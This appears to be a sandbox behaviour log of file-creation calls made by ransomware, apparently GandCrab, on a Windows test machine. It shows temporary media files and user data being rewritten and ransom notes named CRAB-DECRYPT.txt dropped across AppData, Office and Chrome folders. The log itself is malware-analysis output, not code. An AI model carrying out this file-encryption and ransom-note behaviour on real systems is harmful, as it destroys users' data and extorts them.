Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ySgEVn.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\z28ae.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\_E9_ON r.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\FRMDATA64.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\excel.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\mspub.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\outlook.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\powerpnt.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\setup.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\winword.exe_Rules.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-e jJuv2TeKL.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-ZZr9xYkqr28kj4Ewly.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\0rGnGm QreoWsur9e.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1dIAUE6JjxOcRnUgYL.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\1wJk.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2GRWsBis.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2nz3uSwqyVXWxqCOCF18.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\4229bD.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dBLEEVc8Nl3ui3b.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\DdyE 50uK2L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\dPo3pQlaA.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\F-PsEooiB7-oXDbtz1id.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fAfwVeyGLAK7P93Obz3Y.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hf1D.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hLFQVM89GDd j6TcCek.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\iEyof2ITfx5.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\KAwEoER.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\l5sTDgUGeyhDz.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\LtnS7XaVnVQol2Qn1xH.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mLE9mf-BdFdOibSg9l.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\oUGX-5zbSZw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\QZg7oH35.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\R6QY5M2ifYeXIFzAbryD.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Rw3B6OL.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\SDaC6UaMD-p1Jk.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tVTfmiVg4ragt74J-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\vO1f0VBn.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\WjWFRmK.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\XL3UQ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\YO5CdbmrFGoGb.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ySgEVn.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\z28ae.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\_E9_ON r.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadMetrics-active.pma desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
